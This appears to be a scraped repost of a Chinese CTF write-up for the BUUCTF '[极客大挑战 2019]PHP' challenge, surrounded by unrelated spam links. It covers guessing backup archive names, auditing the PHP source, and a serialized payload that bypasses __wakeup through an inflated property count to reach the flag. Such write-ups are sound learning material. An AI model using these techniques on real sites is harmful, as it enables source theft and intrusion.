当前位置: 首页 > wzjs >正文

实训网站建设的心得总结动漫制作专业需要学什么

wzjs 2025/9/7 14:30:09
实训网站建设的心得总结,动漫制作专业需要学什么,室内设计效果图多少钱,网店运营流程步骤题目来源:BUUCTF [极客大挑战 2019]PHP 目录 一、打开靶机,整理信息 二、解题思路 step 1:目录扫描、爆破 step 2:代码审计 1.index.php 2.class.php 3.flag.php step 3:绕过__wakeup重置 ​编辑 三、小结…

题目来源:BUUCTF  [极客大挑战 2019]PHP

目录

一、打开靶机,整理信息

二、解题思路

step 1:目录扫描、爆破

step 2:代码审计

1.index.php

2.class.php

3.flag.php

step 3:绕过__wakeup重置

​编辑

三、小结

一、打开靶机,整理信息

        根据题目名称php,以及页面的备份网站的提示,这里应该有下载备份文件,里面应该有php文件要进行代码审计

二、解题思路

step 1:目录扫描、爆破

目录扫描文件太多了,找不到有用信息,可以尝试输入网站源码备份文件,看看能不能碰对

常见的网站源码备份文件后缀:

tar、tgz、zip、rar、bak、7z

常见的网站源码备份文件名:

web、website、backup、back、www、wwwroot、temp

爆破一下

        url传参看看,得到一个压缩文件夹,点进去得到一堆源码文件

        整理一下进行代码审计

step 2:代码审计

1.index.php

index.php主要是设计,有用信息已经摘抄了

<?phpinclude 'class.php';$select = $_GET['select'];$res=unserialize(@$select);?>

        文件包含class.php文件,并且是GET传参,参数为select,然后将其进行反序列化

2.class.php

<?php
include 'flag.php';error_reporting(0);class Name{//设置两个私有变量private $username = 'nonono';private $password = 'yesyes';//利用__construct构造函数,在创建对象时初始化$username和$password属性public function __construct($username,$password){$this->username = $username;$this->password = $password;}//当对象被反序列化时,__wakeup方法会被自动调用,将$username重置为guestfunction __wakeup(){$this->username = 'guest';}//当对象被销毁时,__destruct方法会被自动调用function __destruct(){if ($this->password != 100) {  //检查password是否等于100echo "</br>NO!!!hacker!!!</br>";echo "You name is: ";echo $this->username;echo "</br>";echo "You password is: ";echo $this->password;echo "</br>";die();}if ($this->username === 'admin') {  //如果password等于100,则进一步检查username是否等于admin,等于则输出flagglobal $flag;echo $flag;}else{echo "</br>hello my friend~~</br>sorry i can't give you the flag!";die();}}
}
?>

代码总结:要想输出flag信息,就要绕过__wakeup重置,并且password要等于100,username要等于admin

3.flag.php

<?php
$flag = 'Syc{dog_dog_dog_dog}';
?>

        什么也不是

step 3:绕过__wakeup重置

        根据上面代码审计结果,用脚本得到payload,脚本来源:[极客大挑战 2019]PHP 1_php 在线挑战-CSDN博客

<?php
class Name{private $username = 'admin';private $password = '100';
}
$select = new Name();
$res=serialize(@$select);
echo $res
?>

序列化结果有未显示字符,另外绕过wakeup方法要让成员属性数目大于实际数目

当成员属性数目大于实际数目时可绕过wakeup方法

        所以要将序列化结果中的2改为3,将未显示字符变为%00,再传参

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

        得到flag

三、小结

1.常见的网站源码备份文件后缀:

tar、tgz、zip、rar、bak、7z

常见的网站源码备份文件名:

web、website、backup、back、www、wwwroot、temp

2.当成员属性数目大于实际数目时可绕过wakeup方法

http://www.dtcms.com/wzjs/643995.html

相关文章:

  • 网站建设搭配html5网站是用什么软件做的吗
  • 网站构建的一般流程是什么网站开发实例教程实训心得
  • 课程网站建设的基本原理做网站备案需要什么
  • 网站入口设计wordpress 菜单无法保存
  • 怎么建设网站法库综合网站建设方案
  • 做悬赏的网站建设信用卡积分商城网站
  • 网站建设与管理技术发展网站内容编辑器
  • 怎么做游戏测评视频网站广东微信网站制作报价表
  • 外贸网站推广方案百度域名是什么意思
  • 学校网站建设招聘买卖链接网
  • 网站大数据怎么做怎样在手机做自己的网站
  • 仿站吧摄影工作室logo设计
  • 昆明淘宝网站建设怎么做好网站开发 设计
  • 做教育app的网站有哪些软件开发专业词汇
  • 网站建设pc指什么南京seo排名外包
  • 风景网站模板做网站公司大连
  • seo引擎搜索网站网站开发合同范本 doc
  • 越秀区建设局网站南昌新手网站建设费用
  • 东莞常平中学google seo教程
  • 林州风景网站建设的目的商城网站建设需求分析
  • asp.net+网站开发+实战网站建设中制作页面导航
  • 怎么给自己的网站做seo东莞网站建设东莞
  • 网站项目设计具体方案全国思政网站的建设情况
  • 专题研究网站建设工作动态站长网站
  • 福州网站建设策划丹阳网站设计
  • 深圳商业网站建设案例wordpress媒体库默认路径
  • 网站悬浮广告代码天津西青网站建设公司
  • 高端网站开发公司wordpress调整meta
  • 主题资源网站建设作业那里可以做旅游网站的吗
  • 做网站需要字体切换济宁城乡住房建设网站